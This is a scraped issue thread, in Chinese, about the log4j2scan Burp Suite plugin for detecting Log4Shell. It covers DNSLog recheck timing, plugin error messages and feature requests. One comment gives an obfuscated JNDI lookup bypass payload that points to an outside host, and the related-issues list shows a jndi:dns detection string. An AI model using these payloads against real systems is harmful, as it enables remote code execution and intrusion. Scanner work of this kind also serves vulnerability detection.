Comments (13)
POC目前是以插件的形式存在与本插件中的,如果手工提供poc,插件将无法确定这是属于哪个Dnslog平台,也就无法扫描闭环,所以就没有意义了。
如果可以的话麻烦提供下bypass的语句,我添加进本插件中,这样可以直接选中你提供的bypass POC就可以了。
from log4j2scan.
好的 请把这个poc添加到插件中,,${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z
from log4j2scan.
from log4j2scan.
使用过程中还发现一个问题,就是我每天扫描的url比较多 ,每次扫到漏洞之后 必须等待burp全部流量扫描完成之后才能给出结果,插件虽然给出了漏洞的链接,但是没有给出具体的注入点,,,必须等待burp扫描完成才能看到准确的post包和注入点,,能不能在插件ui里面增加一个扫到结果直接给出具体注入点和post包的功能,不用等待burp流量全部走完。这样会大大节省作业时间。
from log4j2scan.
还有一个问题,插件新增的延迟检测功能我不太清楚具体的思路和延迟等待时间是多久,而且我感觉这个功能有点问题,可以不用添加这个功能,因为这个功能不适合插件我感觉,像这种延迟比较高的 手动等待就行了,,目前我遇到的延迟dnslog不会延迟很久正常就行,,遇到的延迟只有是反弹shell个别站点会延迟几分钟弹回来,,我现在使用的还是老版本感觉很好用,新版本我感觉有问题就没有一直使用。
from log4j2scan.
还有一个问题,插件新增的延迟检测功能我不太清楚具体的思路和延迟等待时间是多久,而且我感觉这个功能有点问题,可以不用添加这个功能,因为这个功能不适合插件我感觉,像这种延迟比较高的 手动等待就行了,,目前我遇到的延迟dnslog不会延迟很久正常就行,,遇到的延迟只有是反弹shell个别站点会延迟几分钟弹回来,,我现在使用的还是老版本感觉很好用,新版本我感觉有问题就没有一直使用。
这个其实是在原有逻辑上加了一层逻辑而已,就是在首次查询dnslog记录的时候没有查询到,那就将这条记录存到一个map里,然后后面的5分钟内每30s再次查询判断是否触发,所以只是在原逻辑上加了一层保险,而并没有修改原始的逻辑,总体来讲肯定是比早期版本的效果更好一些的
from log4j2scan.
使用过程中还发现一个问题,就是我每天扫描的url比较多 ,每次扫到漏洞之后 必须等待burp全部流量扫描完成之后才能给出结果,插件虽然给出了漏洞的链接,但是没有给出具体的注入点,,,必须等待burp扫描完成才能看到准确的post包和注入点,,能不能在插件ui里面增加一个扫到结果直接给出具体注入点和post包的功能,不用等待burp流量全部走完。这样会大大节省作业时间。
这个不应该啊,每条链接都是一个单独的扫描任务,如果插件日志输出了漏洞信息burp的issue界面也会同步展示漏洞的,理论上不会出现等所有流量走完才出现问题详情的。
from log4j2scan.
啥时候把新的poc加进去那一版 发布一下 我自己不会编译 属于脚本小子
from log4j2scan.
作者能不能开发一个fastjson的插件或者spring一些rce洞比如spring4shell Spring Cloud Gateway,我不想用市面上的 我想用你写的 我感觉你的插件写的很好 虽然我不懂代码 但是我从使用来说你的插件代码水平很厉害,因为我用你的插件拿到了很多赏金。
from log4j2scan.
get backend result failed! 这个意思是插件报错了 还是没有获取到返回的dnslog平台记录 是正常返回 还是插件报错返回
from log4j2scan.
Has missing match scan point: 4960,recheck DNSLog result 这个是正常返回 还是报错了
from log4j2scan.
get backend result failed! 这个意思是插件报错了 还是没有获取到返回的dnslog平台记录 是正常返回 还是插件报错返回
这个是获取dnslog平台记录失败,一两次失败也没事,会重试的
from log4j2scan.
Has missing match scan point: 4960,recheck DNSLog result 这个是正常返回 还是报错了
这个也是正常的,就是有4960个没触发的,重新检查是否触发
from log4j2scan.
Related Issues (20)
- 大佬看到回一下 感谢 HOT 1
- Url param fuzz missing. HOT 1
- 内网检测版本 HOT 1
- 在内网不出网或没有域名的情况下,建议采用${jndi:dns://xxx.xxx.xxx.xxx:port/dnsFlag.XXX}的方式来检测 HOT 6
- emmm,关于ceye的一点小问题 HOT 5
- 这个错误是什么 HOT 1
- 优化建议 HOT 4
- 优化建议 HOT 2
- 建议增加对 JNDIScan支持 HOT 1
- 希望可以填入指定的ip和端口
- 建议添加GoDnslog端口号的选项
- 自定义head头 HOT 2
- 遇到会ceye上出现记录了,但是burp上一直没有显示,会有很长时间的延迟,有时候长有时候短 HOT 2
- 问题 HOT 1
- 已不兼容burpsuite 2022.9.1 HOT 8
- 为什么我设置了revsuit rmi 但是探测仍然是使用的dnslog呢? HOT 3
- 问题 HOT 1
- method GET must not have a request body. HOT 1
- dnslog其他格式
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from log4j2scan.